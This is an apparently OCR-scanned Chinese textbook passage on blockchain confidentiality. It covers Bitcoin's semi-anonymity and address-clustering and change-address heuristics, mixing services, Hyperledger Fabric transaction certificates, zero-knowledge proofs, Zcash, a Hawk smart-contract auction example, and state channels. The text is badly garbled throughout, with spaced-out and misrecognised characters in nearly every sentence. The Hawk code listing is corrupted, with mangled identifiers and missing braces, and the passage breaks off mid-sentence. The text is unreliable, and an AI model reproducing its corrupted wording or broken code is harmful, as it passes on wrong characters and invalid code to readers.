如 图 1-1 左 边 所 示 ， 传 统 的 信息 安全 主要 涉及 保密 性 、 可 用 性 和 完整 性 3 个 要 素 。 随 着 物 联网 (loT) 的 发 展 ， 这 3 个 要 素 已 经 不 能 完整 地 代表 安全 需求 了 。 
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图 1-1 安全 要 素 的 转变 


1.1 和 保密 性 


保密 性 (Conf identiality) 是 指 网 络 信息 不 会 被 泄漏 给 非 授权 的 用 户 、 实 体 或 过 程 ， 即 信息 只 能 供 授权 用 户 使 用 。 信 息 外 露 已 经 成 为 影响 信息 化 技术 发展 的 重要 因素 ， 没 有 人 愿意 自己 的 隐私 信息 被 
他 人 获取 。 区 块 链 的 发 展 与 信息 的 保密 性 紧密 联系 在 一 起 。 从 本 质 上 分 析 ， 区 块 链 属于 分 布 式 账本 。 与 传统 的 信息 技术 不 同 ， 它 通过 去 中 心 化 、 去 信任 的 方式 对 可 靠 数据 库 进 行 集体 维护 。 


常用 的 保密 技术 包括 以 下 几 种 。 

1) 物理 保密 : 利用 各 种 物理 方法 ， 如 限制 、 隔 离 、 掩 巩 、 控 制 等 ， 保 护 信 息 不 被 泄漏 。 

2) 防 窃听 : 使 对 手 侦 收 不 到 有 用 的 信息 。 

3) 防 辐射 : 防止 有 用 信息 以 各 种 途径 辐射 出 去 。 

4) 信息 加 密 : 在 密 钥 的 控制 下 ， 用 加 密 算法 对 信息 进行 加 密 处 理 。 即 使 对 手 得 到 了 加 密 后 的 信息 ， 也 会 因为 没有 密 钥 而 无 法 读 懂 有 效 信息 。 


5) 授权 (Authorization) 和 验证 (Authentication) 。 常 见 的 授权 包含 验证 与 访问 控制 (Access Control) 两 个 部 分 。 验 证 是 指 用 户 或 者 业务 模块 通过 一 个 私密 的 凭证 来 确保 身份 。 它 可 以 是 一 个 
密码 ， 可 以 是 一 类 数字 签名 (包括 证 书 ) ， 也 可 以 使 用 相对 复杂 的 双向 动态 授权 协议 。 验 证 后 的 访问 控制 则 是 将 数据 权限 进行 更 细 粒 度 的 拆 分 ， 提 供 一 次 性 或 者 短暂 性 的 访问 权限 。Token 作 为 一 个 权 
证 ， 只 能 用 来 访问 其 对 应 权限 下 的 数据 ， 可 以 防止 私密 数据 过 量 泄漏 。 而 目前 一 些 新 的 方法 中 ， 权 证 分 发 本 身 被 改善 成 了 一 个 数字 签名 的 过 程 ， 通 过 完全 的 非 对 称 密码 系统 ， 让 数据 提供 方 原本 需要 保存 
的 Token， 和 转变 为 只 需要 验证 访问 请 求 所 携带 的 数字 签名 就 可 以 获知 权限 的 Certif icate/Signature。 例 如 ，Hyperledger 区 块 链 平台 就 采用 这 种 方式 ， 分 别 签发 注册 凭证 (Enrollment Certif icate) 和 交 
易 凭证 (Transaction Certif icate) ， 为 不 同 的 业务 场景 提供 不 同 的 数据 访问 权限 。 


区 块 链 主要 采用 地 址 随机 化 、 信 息 加 密 和 状态 通道 的 方式 来 做 到 信息 的 保密 。 


1.1.1 ”比特 币 的 半 匿 名 性 


比特 币 的 出 现 对 虚拟 货币 领域 而 言 具有 划时代 的 意义 。 它 采取 分 布 式 的 设计 并 且 将 发 行 权 分 享 给 很 多 的 用 户 ， 通 过 特殊 的 计算 方法 ， 可 以 避免 超 量 发 行 的 篮 炊 。 在 设计 方面 ， 比 特 币 是 以 密码 箱 的 设 
计 原 则 为 基础 ， 对 保障 流通 交易 的 安全 性 和 保密 性 具有 重要 作用 。 


1. 半 匿名 性 与 隐私 安全 


比特 币 用 户 的 地 址 是 由 随机 算法 产生 的 ， 具 有 一 定 的 保密 性 。 一 个 用 户 可 以 有 多 个 比特 币 地 址 ， 并 且 地 址 跟 他 现实 生活 中 的 真实 身份 没有 任何 联系 ， 因 而 具有 一 定 匿名 性 。 不 过 这 一 特性 实 为 “ 半 匿 
名 ”， 比 特 币 的 交易 仍 可 以 追 本 溯源 到 交易 者 本 身 。 比 特 币 的 交易 历史 是 完全 公开 的 ， 所 有 人 都 可 以 通过 钱包 地 址 在 区 块 链 中 查询 钱包 现金 的 流入 与 流出 ， 并 可 向 上 追溯 至 这 些 比 特 币 的 终极 起 源 ， 即 从 
区 块 生 成 后 发 送 到 的 那个 地 址 。 这 对 个 人 隐私 构成 了 巨大 威胁 。 


比特 币 协 议 为 上 述 问 题 提 供 了 两 种 解决 方案 : 
1) 所 有 的 比特 币 交 易 使 用 公共 密 钥 ， 而 无 须 个 人 身份 证 明 ; 
2) 比特 币 客户 端 可 以 生成 无 数 个 公共 密 钥 ， 以 帮助 用 户 防止 跟 中 。 


然而 ， 越 来 越 多 的 研究 表明 ， 这 些 保护 措施 是 不 够 的 。 如 果 通 过 一 些 社会 工程 学 手段 ， 使 得 某 个 比特 币 钱包 的 物理 地 址 (如 IP 地 址 ) 暴露 ， 再 配 以 大 数据 分 析 ， 那 么 资金 的 来 龙 去 脉 与 天 系 网 将 无 从 
通 形 。 德 国 和 瑞士 学 者 的 一 项 研究 显示 ， 约 40% 比 特 币 用 户 的 真实 身份 可 被 发 现 ， 这 其 中 有 些 用 户 还 使 用 了 官方 推荐 的 隐私 保护 措施 。 美 国 加 州 大 学 圣地 亚 哥 分 校 研 究 者 发 表 的 一 篇 论文 中 称 ， 比 特 币 交 
易 网 络 对 少数 大 账户 的 依赖 性 与 日 俱 增 ， 这 使 得 用 户 的 身份 安全 性 大 大 降低 。 日 后 ， 通 过 大 宗 交 易 追 踪 到 交易 者 的 真实 身份 将 变 得 很 容易 。 


从 本 质 上 来 说 ， 比 特 币 的 去 匿名 化 依赖 于 根本 性 的 洞察 。 仪 仅 给 定 一 组 天 于 人 的 信息 和 一 组 天 于 比特 币 交易 的 信息 ， 而 不 提供 任何 涉及 二 者 天 系 的 信息 ， 则 确定 哪个 地 址 属于 哪个 人 确实 是 非常 困难 
的 。 但 是 ， 当 你 知道 哪怕 一 条 关联 信息 川 ， 可 能 很 快 就 可 以 确定 该 用 户 最 喜欢 的 商家 。 除 了 简单 地 “追踪 比特 币 ”， 还 有 两 个 比特 币 侦探 可 以 使 用 的 更 高 级 的 工具 ，。 
2. 破 解 半 匿名 的 方法 

(1) 闭 包 


首先 ， 存 在 一 个 概念 ， 即 闭 包 。 我 们 来 看 一 个 示例 。 如 果 地 址 A 在 某 个 闭 包 里 并 且 存 在 一 个 使 用 来 自 地 址 A 和 地 址 B 的 货币 作为 输入 的 交易 ， 则 地 址 B 也 在 该 闭 包 里 。 计 算 一 个 地 址 的 闭 包 时 ， 只 需 在 从 
这 个 地 址 开始 ， 一 直到 你 停止 添加 新 地 址 的 过 程 中 重复 地 应 用 闭 包 的 定义 。 


这 个 概念 的 威力 如 下 : 同一 个 闭 包 里 的 所 有 地 址 几乎 可 以 肯定 都 归 同 一 个 用 户 所 有 。 如 果 一 个 交易 有 多 个 输入 地 址 ， 则 原因 几乎 总 是 用 户 需 要 把 一 定数 额 的 钱 支付 到 某 个 地 址 里 ,但 是 其 任何 一 个 地 
址 里 钱 的 总 额 都 不 够 ， 于 是 钱包 软件 为 了 付款 不 得 不 从 两 个 甚至 更 多 的 地 址 里 取 钱 。 有 了 这 个 工具 ， 如 果 你 能 证 明 哪怕 一 个 地 址 归属 于 某 个 具体 的 人 (比如 说 ， 如 果 你 是 一 个 从 他 们 那里 接受 比特 币 付款 
的 商人 ) ， 那 么 你 就 很 可 能 发 现 他 们 的 绝 大 部 分 钱包 地 址 。 


(2) “零钱 地 址 ”启发 式 算法 


在 消费 时 ， 零 钱 地 址 被 比特 币 钱包 用 来 发 送 额 外 的 钱 给 交易 的 收 款 地 址 。 比 如 ， 如 果 你 收 到 了 50 比 特 币 ， 然 后 花 了 1 比特 币 ， 剩 余 的 49 比 特 币 就 存 入 一 个 由 你 的 钱包 新 生成 的 零钱 地 址 。 之 所 以 不 把 
那 49 比 特 币 发 回 原来 的 地 址 ， 是 为 了 增加 隐蔽 性 。 有 人 已 经 找到 局 发 式 算法 来 解决 怎么 才能 自动 辨别 零钱 地 址 和 交易 的 正常 收 款 地 址 。 通 过 这 类 启发 式 算法 ， 研 究 人 员 比 只 使 用 地 址 闭 包 发 现 了 更 多 的 绪 
索 ， 常 常 可 以 追踪 交易 链 长 达 几 百 步 并 最 终 获 得 成 功 。 


3. 弥 补 匿名 性 不 足 的 方法 


解决 比特 币 匿名 性 不 足 的 方法 除了 利用 单个 钱包 多 个 地 址 以 外 ， 还 有 一 种 是 混合 服务 。 比 如 ， 在 网 站 blockchain.info 和 丝绸 之 路 上 的 服务 。 混 合 服务 的 工作 原理 如 下 : 用 户 给 混合 服务 一 个 接收 混合 
后 的 比特 币 的 地 址 ， 而 混合 服务 给 用 户 一 个 发 送 比特 币 的 地 址 。 全 世界 成 王 上 万 的 用 户 把 比特 币 发 送 给 混合 服务 商 ， 而 服务 商 在 内 部 进行 混合 后 ， 除 了 扣除 少量 手续 费 外 ， 其 余 的 比特 币 如 数 (不 是 相同 
的 比特 币 ) 发 到 每 个 用 户 的 接收 地 址 上 。 由 于 在 区 块 链 上 找 不 到 用 户 发 送 地 址 和 接收 地 址 的 关联 ， 所 以 在 理论 上 只 要 混合 完成 相 天 信息 就 会 被 抹 掉 。 但 是 ， 这 种 匿名 方式 需要 提前 建立 双方 的 信任 。 用 户 
不 仅 需 要 信任 服务 商 不 会 透露 自己 的 两 个 地 址 之 间 的 关联 ， 还 需要 相信 服务 商 不 会 偷 走 自己 的 钱 。 如 果 服 务 商 偷 了 钱 ， 用 户 将 无 法 证 明 。 


此 外 ， 比 特 币 开发 者 Amir Taaki 和 Pablo Martin 研 究 出 一 种 新 的 方法 





半 去 中 心 化 来 解决 比特 币 的 半 匿 名 性 问题 ， 其 工作 原理 大 致 如 下 。 


N 个 人 聚 在 一 起 并 且 同 意 混合 X 个 比特 币 ， 他 们 中 的 一 个 人 发 送 N 和 X 的 值 以 及 “房间 号 码 ” 给 一 个 中 间 服 务 商 。 每 个 人 用 匿名 网 络 (比如 Tor) 给 服务 商 发 送 一 条 带 有 房间 号 码 和 接收 地 址 的 信息 。 一 
旦 N 个 人 都 发 送 进来 了 他 们 的 接收 地 址 ， 则 服务 商会 给 每 个 人 发 送 确认 信息 。 每 个 人 都 匿名 地 给 服务 商 友 送 一 条 包含 房间 号 和 发 出 地 址 的 信息 。 服 务 商 在 所 有 人 都 把 X 个 比特 币 友 过 来 后 ， 用 这 些 比特 币 构 
造 一 个 交易 并 向 每 个 接收 地 址 发 送 X 个 比特 币 。 然 后 ， 服 务 商 把 交易 发 给 每 个 人 来 签名 。 每 个 人 都 检查 交易 中 向 自己 的 接收 地 址 发 送 的 比特 币 的 数额 是 否 正 确 ， 检 查 完毕 后 发 送 给 服务 商 自己 的 签名 。 随 


交 
后 ， 服 务 商 公开 签 过 名 的 交易 。 


如 上 所 说 ， 这 个 协议 没有 一 点 特别 的 创意 。 事 实 上 ，Taaki 和 Martin 第 一 次 发 现 这 个 主意 是 在 一 个 比特 币 开 发 员 Gregory Maxwell 描 述 CoinJoin 概 念 的 论坛 帖子 里 。 然 而 ， 神 奇 的 地 方 在 于 它 的 实现 
过 程 ， 这 两 个 人 使 用 Taaki 本 人 发 明 的 比特 币 工 具 箱 SX 快速 实现 了 交易 。 这 种 实现 方法 的 优势 在 于 易于 使 用 。Taaki 和 Martin 专 门 创造 了 一 个 简单 的 图 形 用 户 界面 ， 用 户 只 需 输入 发 送 地 址 、 服 务 商 的 网 址 
和 接收 地 址 ， 系 统 就 会 自动 处 理 一 切 。 


中 间 商 不 知道 哪个 发 送 地 址 对 应 着 哪个 接收 地 址 (因为 人 们 在 不 同 阶段 、 不 同时 间 发 送 他 们 的 信息 ) ， 也 没有 机 会 偷 走 比特 币 。 如 果 中 间 商 用 自己 的 接收 地 址 替换 了 别人 的 接收 地 址 ， 没 有 收 到 比特 
币 的 人 发 现 后 会 拒绝 签收 交易 ， 这 将 导致 协议 失效 。 唯 一 失败 的 可 能 性 只 在 于 没有 发 生 的 交易 。 此 外 ， 任 何人 都 可 以 成 为 交易 商 而 本 质 上 却 不 需要 任何 起 步 费 。 实 际 上 ， 完 全 去 中 心 化 的 体系 可 以 让 N 个 
人 中 的 一 个 人 在 百 忙 之 中 充当 交易 商 。 


这 种 机 制 也 许 不 经 意 间 实现 了 另 一 个 目标 : 如 果 得 到 广泛 的 应 用 ， 它 有 很 大 的 可 能 使 得 “ 闭 包 ”概念 不 能 发 挥 作用 。 闭 包 依赖 的 前 提 假 设 是 一 个 交易 的 所 有 发 送 地 址 都 是 由 一 个 人 签收 的 ， 然 而 交易 
的 不 同 发 送 地 址 是 由 不 同 的 人 签收 的 。 当 然 ， 目 前 使 用 的 协议 可 以 被 轻松 地 骗 过 ， 因 为 闭 包 算法 可 以 故意 避 开 各 个 发 送 地 址 来 发 送 金 额 相等 的 交易 。 从 理论 上 说 ， 一 个 人 在 同一 场 交 易 活动 中 可 以 参加 多 
次 ， 也 就 是 说 发 出 和 接收 的 面额 不 同比 如 说 ,通过 一 个 地 址 发 出 0.03 比 特 币 ， 但 通过 3 个 不 同 接收 地 址 各 收取 0.01 个 比特 币 ) 。 从 另 一 方面 看 ,一 般 的 钱包 可 以 故意 使 它们 的 交易 看 起 来 像 是 匿名 交易 。 
比如 ， 一 个 钱包 提供 商 可 以 使 其 钱包 总 是 提供 0.01 比 特 币 的 零钱 ， 因 而 每 笔 交 易 都 自然 而 然 地 看 起 来 像 是 经 过 了 混合 ( 混 币 ) 。 尽 管 将 来 会 有 一 些 方法 可 以 识破 很 多 这 类 事情 ， 但 是 这 仍然 使 闭 包 的 地 位 
从 必 杀 技 降 为 普通 试探 性 方法 。 


例如 ， 在 2017 年 7 月 被 破获 的 BTC-e 洗 钱 案件 中 ， 安 全 专家 便 是 利用 比特 币 的 半 匿 名 性 的 弱点 追踪 到 嫌疑 人 。 


[1] 某 个 比特 币 交 易 或 地 址 关联 到 现实 世界 中 的 菜 个 具体 的 人 或 事件 ， 从 那里 就 有 可 能 “追踪 比特 币 ” 并 且 获 取 许 多 其 他 方面 的 信息 。 比 如 说 ， 追 踪 者 可 能 会 发 现 该 用 户 的 老板 、 最 喜欢 的 商家 、 顾 客 和 其 
他 人 的 比特 币 地 址 。 


1.1.2 ”Hyperledger Fabric CA 的 动态 交易 证 书 


超级 账本 (Hyperledger) 是 Linux 基 金 会 于 2015 年 发 起 的 推进 区 块 链 数字 技术 和 交易 验证 的 开源 项 目 ， 其 目标 是 让 成 员 共 同 合作 ， 共 建 开放 和 平台， 满足 多 个 行业 用 户 的 需求 ， 并 简化 业务 流程 。 
Hyperledger Fabric CA 是 Fabric 的 一 个 重要 模块 ， 如 图 1-2 所 示 。 
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图 1-2 ”CA 在 Hyperleder Fabtic 框 架 体 系 架 构 中 的 流程 图 


Fabric CA 为 网 络 提供 身份 管理 、 隐 私 、 保 密 和 可 审计 性 的 服务 。 在 一 个 不 带 权限 的 区 块 链 中 ， 参 与 者 是 不 需要 被 授权 的 ， 且 所 有 的 节点 都 可 以 同样 地 提交 交易 并 把 它们 汇集 到 可 接受 的 块 中 。 例 如 ， 
它们 没有 角色 的 区 分 。Fabric CA 通过 公 钥 基础 设施 (Public Key Infrastructure，PKI) 和 去 中 心 化 、 共 识 技术 使 得 不 带 权限 的 区 块 链 变 成 带 权 限 的 区 块 链 。 在 Fabric 中 ， 用 户 通 过 注册 来 获得 长 时 间 的 、 
可 能 根据 用 户 类 型 生成 的 身份 凭证 (或 称 登记 证 书 ，Enrollment Certif icates) 。 在 用 户 使 用 过 程 中 ， 这 样 的 证 书 允 许 交 易 证 书 颁发 机 构 (Transaction Certif icate Authority，TCA) 颁发 匿名 的 动态 
交易 证 书 。 动 态 交 易 证 书 解 决 了 比特 币 的 半 匿 名 问题 ， 因 为 每 一 笔 不 同 的 交易 可 以 用 不 同 的 动态 交易 证 书 。 实 体 的 登记 证 书 可 以 用 来 产生 动态 交易 证 书 ， 但 是 按照 密码 学 原理 ， 从 动态 交易 证 书 不 可 能 推 
断 出 实体 的 登记 证 书 ， 这 样 用 户 的 数据 加 密 得 到 了 保障 。 


1.1.3 ”用 零 知识 证 明 做 数据 加 密 
零 知 识 证 明 (Zero Knowledge Proof，ZKP) 并 非 新 鲜 事 物 ， 其 概念 初 见于 1985 年 的 论文 《互动 证 明 系 统 的 知识 复杂 性 》。ZKP 是 一 种 密码 学 技术 ， 人 允许 两 方 (证明 者 和 验证 者 ) 来 证 明 某 个 提议 是 
真实 的 ， 而 且 无 须 泄漏 除了 它 是 真实 的 之 外 的 任何 信息 。 在 密码 学 货币 和 区 块 链 中 ， 这 通常 是 指 交 易 信息 数据 。 


有 人 借用 最 简单 的 阿拉 伯 童 话 《 一 干 零 一 夜 》 对 零 知 识 证 明 做 了 通俗 、 形 象 的 介绍 。 阿 里 巴巴 掌握 着 让 芝 采 开门 的 台 语 。 强 资 向 他 拷问 打开 山洞 石门 的 允 语 时 ， 他 不 想 让 人 听 到 如 语 ， 于 是 想 了 个 好 
办 法 。 他 对 强盗 说 : “你 们 离 我 一 箭 之 地 ， 用 弓箭 指 着 我 。 你 们 举 起 右手 我 就 念 邵 语 打开 石门 ， 举 起 左手 我 就 念 驼 语 关上 石门 。 如 果 我 做 不 到 或 逃跑 ， 你 们 就 用 弓箭 射 死 我 。” 强盗 们 同意 了 ， 因 为 这 能 
帮助 他 们 搞 清 楚 阿 里 巴巴 到 底 是 否 知 道 完 语 这 个 问题 。 强 盗 举 起 了 右手 ， 只 见 阿 里 巴巴 的 嘴 动 了 几 下 ,石门 果真 打开 了 。 强 资 举 起 了 左手 ， 阿 里 巴巴 的 嘴 动 了 几 下 后 石门 义 关 上 了 。 强 盗 还 是 有 点 不 信 ， 
说 不 准 这 是 巧合 呢 。 于 是 不 断 地 换 着 节奏 举 右手 、 举 左手 ,石门 跟着 他 们 的 节奏 开 开关 关 。 最 后 强 咨 们 想 ， 如 果 还 认为 这 只 是 巧合 ， 自 己 未 免 是 个 傻 扒 ， 那 还 是 相信 阿里 巴巴 吧 。 这 就 是 最 简单 易 懂 的 零 
知识 证 明 。 大 量 事实 证 明 ， 零 知识 证 明 在 密码 学 中 非常 有 用 。 如 果 能 够 将 零 知 识 证 明 用 于 验证 ， 将 可 以 有 效 解决 许多 问题 。 


根据 零 知 识 证 明 的 定义 和 有 关 例 子 ， 可 以 得 出 零 知 识 证 明 具 有 以 下 3 条 性 质 。 
@ 完 备 性 。 如 果 证 明 方 和 验证 方 都 是 诚实 的 ， 并 遵循 证 明 过 程 的 每 一 步 ， 进 行 正 确 的 计算 ， 那 么 这 个 证 明 一 定 是 成 功 的 ， 验 证 方 一 定 能 够 接受 证 明 方 。 
@ 合 理性 。 没 有 人 能 够 假冒 证 明 方 ， 使 这 个 证 明成 功 。 


@ 零 知识 性 。 证 明 过 程 执行 完 之 后 ， 验 证 方 只 获得 了 “证 明 方 拥有 该 知识 ”这 条 信息 ， 而 没有 获得 关于 该 知识 本 身 的 任何 一 点 信息 。 


零 知 识 证 明 及 其 有 关 协 议 的 主要 优点 : 

Q@ 随 着 零 知 识 证 明 的 使 用 ， 安 全 性 不 会 降级 ， 因 为 该 证 明 具有 和 零 知 识 性 质 。 

@ 高 效 性 。 该 过 程 计 算 量 小 ， 双 方 交换 的 信息 量 少 。 

@ 安 全 性 依赖 于 未 解决 的 数学 难题 ， 如 离散 对 数 、 大 整数 因子 分 解 、 平 方 根 等 。 


@ 许 多 零 知 识 证 明 相关 的 技术 避免 了 直接 使 用 有 政府 限制 的 加 密 算法 ， 这 就 给 相关 产品 的 出 口 带 来 了 优势 。 
1. 利 用 零 知 识 证 明 的 Zcash 


为 了 让 比特 币 变 得 更 具 隐 匿 性 ，Zooko Wilcox 发 起 了 Zerocoin 项 目 ， 并 在 Zcash 协 议 ( 即 Zerocash) 的 原 开 发 团队 、 约 翰 ' 堆 普 金 斯 大 学 、 麻 省 理工 学 院 、 以 色 列 理工 学 院 和 特拉维夫 大 学 的 各 个 小 
组 的 共同 协作 下 ， 逐 步 提高 了 原 协 议 ( 即 Zerocoin) 的 效率 和 匿名 性 。 “棱镜 门 ” 事 件 的 主角 爱德华 .斯 诺 登 曾 这 样 评价 该 项 目 : 可 解决 比特 币 匿名 程度 不 够 的 问题 。 


Zerocoin 项 目的 原理 : 在 比特 币 交 易 的 区 块 链 的 主 链 上 再 加 上 一 条 侧 链 ， 这 条 侧 链 用 于 在 数字 货币 交易 过 程 中 ， 当 “付费 者 ”的 数字 货币 从 钱包 拿 出 的 时 候 就 将 其 拆 分 成 数 份 ， 并 在 全 网 上 重 发 一 
遍 。 而 这 些 被 拆 分 的 数字 货币 会 在 到 达 “ 收 款 者 ”的 地 址 之 前 组 合 到 一 起 ， 从 而 达到 匿名 交易 的 目的 。 


随 着 Zerocash 技 术 不 断 成 熟 ， 人 们 认为 是 时 候 开 发 一 种 新 的 数字 货币 来 取代 比特 币 了 。 于 是 2016 年 1 月 20 日 Zcash 官 网 宣布 : “Zerocash 协 议 ” 将 被 开发 成 一 种 全 新 的 数字 货币 ， 即 Zcash。 它 与 比 
特 币 的 相同 之 处 在 于 ，Zcash 的 总 量 也 被 设 为 2100 万 。Zcash 采 用 PoW 分 配方 式 ， 前 4 年 里 ， 矿 工 挖 矿 所 得 的 20% 会 自动 分 配给 Zcash 团 队 和 其 投资 者 ， 也 就 是 总 量 的 10%。Zcash 项 目的 主要 特点 ， 是 其 
交易 会 自动 隐藏 区 块 链 交易 的 发 送 方 、 收 款 方 以 及 交易 的 价值 ， 只 有 掌握 正确 的 密 钥 (View Key) 的 人 才 可 访问 这 些 内 容 。 当 然 ， 用 户 可 自行 选择 哪些 人 可 以 拥有 这 种 权限 。Zcash 与 比特 币 相 比 ， 更 注 
重 隐私 ， 以 及 对 交易 透明 的 可 控 性 。 


Zcash 利 用 了 简化 的 零 知识 证 明 一 一 zk-SNARKs ( 零 知识 简洁 非 互 动 性 知识 参数 ) ， 一 种 在 无 须 泄漏 数据 本 身 情况 下 证 明 某 些 数 据 运 算 的 方式 。zk-SNARKs 是 Zcash 和 Hawk (后 文 会 解释 ) 背后 的 
密码 学 工具 ， 这 两 个 协议 都 使 用 了 ZKPs 来 创建 区 块 链 。 在 Zcash 的 例子 中 ， 这 些 SNARKs 被 用 于 验证 交易 ; 在 Hawk 的 例子 中 ， 它 们 被 用 于 验证 智能 合约 。 所 有 这 些 在 完成 的 同时 还 能 保护 用 户 的 隐私 。 


zk-SNARKs 是 一 种 简洁 的 非 互动 性 零 知识 证 明 ， 其 中 的 证 明 非常 简短 ， 很 容易 验证 。 可 以 将 它们 看 作 是 一 个 逻辑 回路 ， 这 个 逻辑 回路 需要 生成 一 个 证 明 来 验证 每 一 笔 交 易 。zk-SNARK 通 过 对 每 一 笔 
交易 进行 快照 来 实现 生成 一 个 证 明 ， 然 后 让 接收 方 相信 计算 是 正确 的 ， 而 且 不 会 泄漏 证 明之 外 的 其 他 任何 数据 。 一 个 SNARK 执 行 的 基本 操作 就 是 将 能 够 解密 的 数据 编码 到 回路 中 。 因 为 zk-SNARKs 能 够 很 
快 被 验证 ， 证 明 计算 量 非常 小 ， 因 此 它们 可 以 保护 运算 的 完整 性 ， 而 且 不 会 给 非 参与 者 融 来 负担 。 需 要 知道 的 是 ， 该 技术 尚未 成 熟 ， 还 有 很 多 局 限 性 。 它 们 是 激励 CPU 来 生成 证 明 ， 需 要 1 分 钟 才能 生成 新 
的 证 明 ， 因 此 规模 化 仍然 是 需要 解决 的 一 个 问题 。zk-SNARKs 另 外 的 一 个 问题 是 开始 的 证 明 方 和 验证 方 的 初始 配置 (intial setup) 可 能 会 被 黑客 利用 。 总 之 ， 该 技术 目前 仍 处 于 不 断 发展 、 成 熟 的 过 程 
中 


2. 利 用 zk-SNARKs 的 Hawk 智 能 合约 


Hawk 的 目的 是 为 以 太 坊 提 供 可 编程 性 和 表达 力 ， 同 时 综合 Zcash 固 有 的 隐私 性 。Hawk 智 能 合约 系统 从 简化 版 本 的 开源 Zerocash 协 议 开 始 ， 在 此 基础 上 建立 智能 合约 层 。Hawk 可 以 把 数据 或 数字 货 
币 进行 加 密 ， 然 后 作为 智能 合约 的 输入 和 输出 。 因 此 ， 在 区 块 链 上 看 不 到 什么 是 智能 合约 的 输入 和 输出 。 此 外 ， 并 不 是 每 一 笔 交 易 都 需要 用 到 | 数据 加 密 的 智能 合约 。 用 户 可 以 根据 特殊 隐私 的 需要 ， 选 择 
可 以 处 理 加 密 数 据 的 智能 合约 。 如 图 1-3 所 示 为 Hawk 编 译 器 的 视图 。 
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图 1-3 ”Hawk 编译 器 视图 


Hawk 程 序 员 可 以 用 直观 的 方式 编写 一 个 需要 加 密 的 智能 合约 ， 而 不 必 考 虑 具体 的 加 密 算法 ，Hawk 的 编译 器 将 自动 生成 有 效 的 零 知 识 证 明 加 密 。 这 样 ， 智 能 合约 的 使 用 者 就 可 以 利用 零 知 识 证 明 加 密 
的 智能 合约 来 进行 交易 。 下 面 是 Hawk 智 能 合约 的 例子 。 智 能 合约 可 以 分 为 公开 和 私有 两 部 分 ， 私 有 的 部 分 (下面 代码 的 第 3 ~ 26 行 ) 可 以 利用 零 知 识 证 明 加 密 来 保护 隐私 。 





1 HawkDeclareParties (Seller,/* N parties */); 

2 HawkDeclareTimeouts (/* hardcoded timeouts */); 
3 // 私有 的 部 分 

4 Private contract auction(InPD &in, Outp &out) { 
5 int winner = -1; 

6 int bestprice = -1; 

7 int secondprice = -1; 



































8 for (nt i = 0; i < N; i++) { 

9 if (in.party[i] .$val > bestprice) { 
10 secondprice = bestprice; 

11 bestprice = in.party[il].$val; 
















































































12 winner = i;} 

13 } else if (in.party[il].$val > secondprice) 1 
14 secondprice = in.partyl[il].S$val; 

1 

16 } 

17 // 优胜 者 支付 secondprice 给 卖主 

18 // 其 他 人 的 资产 将 被 退回 

19 out.Seller.s$val = secondprice; 

20 out.party[winner] .$val = bestprice-secondprice; 
21 out.winner = winner; 

22 for (nt i = 0; i < N; i++) { 

23 if (i != winner) 

24 out.party[il].$val = in.party[I] .Sval， 

25. } 

26 





} 
27 // 公开 的 部 分 
28 public contract deposit { 
29 // Manager 较 早 存 入 SN 
30 gdef check(): // invoked on contract completion 
31 send SN to Manager // refund manager 
32 def managerTimeOut (): 
33 for (i in range(SN) ) : 
34 send $1 to party[i] 
35 } 














1.1.4 ”使 用 状态 通道 让 数据 不 可 见 


状态 通道 让 本 来 应 该 发 生 在 链 上 的 交易 在 不 增加 任何 参与 者 的 前 提 下 搬 到 链 下 去 完成 。 这 种 策略 最 著名 的 例子 是 比特 币 的 文 付 渠道 (闪电 网络) ， 它 允许 在 任何 两 方 之 间 直 接 发 送 不 需要 费用 的 文 付 
或 者 交易 。 文 付 渠 道 状态 通道 的 一 种 形式 。 对 通 带 在 区 块 链 上 执行 的 任何 交易 来 说 ， 通 过 文 付 渠 道 ， 可 以 在 不 需要 任何 额外 信任 的 情况 下 将 这 些 交 易 从 链 上 移 到 链 下 ， 从 而 减少 成 本 ， 提 高 交易 速度 。 


区 块 链 的 一 部 分 状态 是 通过 签名 或 某 种 智能 合约 锁定 的 ， 只 有 相关 的 参与 者 完全 同意 才能 更 新 这 一 部 分 状态 。 参 与 者 可 以 在 链 下 进行 很 多 交易 ， 这 些 交易 不 马上 发 表 在 链 上 。 每 笔 交 易 都 可 以 对 原来 
的 状态 进行 更 新 ， 后 面 的 交易 “上 胜 过 ”以 前 的 交易 。 在 一 系列 的 交易 后 ， 参 与 者 可 以 将 最 后 的 状态 提交 回 链 上 ， 这 将 关闭 状态 通道 。 如 果 参 与 者 之 间 更 新 的 “状态 ”是 数字 货币 余额 ， 那 么 就 是 一 个 支付 
通道 。 付 款 通 道 有 3 个 步骤 : @ 打 开通 道 ， 在 通道 里 进行 交易 ;@ 关 闭 通道 。 打 开 和 关闭 通道 的 步骤 1 和 3 涉及 链 上 操作 。 但 是 在 步骤 2 中 ， 可 以 快速 进行 无 限 数量 的 更 新 ， 而 无 须 涉及 区 块 链 主 链 。 而 这 
正 是 状态 通道 发 挥 作 用 的 地 方 ， 因 为 只 有 步骤 1 和 3 需要 发 布 到 网 络 、 支 付费 用 ， 或 等 待 确认 。 事 实 上 ， 经 过 周密 的 规划 和 设计 ， 状 态 渠 道 几乎 可 以 无 限期 地 保持 开放 ， 并 作为 更 大 的 枢纽 和 分 支 系统 的 一 
部 分 来 为 整个 经 济 或 生态 系统 赋 能 。 

状态 通道 的 一 个 突出 优点 ， 就 是 增强 了 隐私 ， 因 为 状态 通道 使 得 数据 不 会 在 链 上 公开 ， 只 有 参与 者 之 间 (比如 交易 的 买方 和 卖方 ) 才能 看 到 数据 。 经 过 上 交 所 技术 有 限 公司 朱 立 的 同意 ， 下 面 转载 他 
的 文章 来 分 析 闪 电网 络 、 备 电网 络 和 Corda 背 后 的 原理 和 技术 细节 。 


2. 闪 电网 络 概述 


比特 币 自 诞 生起 一 直 存 在 若干 技术 问题 : 论处 理 能 力 ， 目 前 全 网 只 有 7 笔 / 秒 ; 论 时 延 ， 大 致 10 分 钟 才 出 一 个 块 ; 论 交 易 最 终 性 ， 一 般 建议 将 等 待 6 个 块 的 确认 视 作 交易 最 终 化 ， 大 额 交 易 则 建议 等 待 更 
多 ; 论 容量 ， 目 前 已 生成 40 多 万 个 区 块 ， 约 60GB 数 据 量 ， 且 眼见 的 未 来 只 见 增加 不 见 减少 。 


在 内 电网 络 出 现 前 ， 昌 然 比特 币 社区 也 试图 通过 区 块 扩容 、 隅 离 见 证 等 技术 在 一 定 程度 上 提高 交易 处 理 能 力 ， 但 始终 无 法 实现 数量 级 的 改善 。 至 于 前 面 提 及 的 其 他 技术 难题 ， 现 存 的 PoW 机 制 是 万 万 
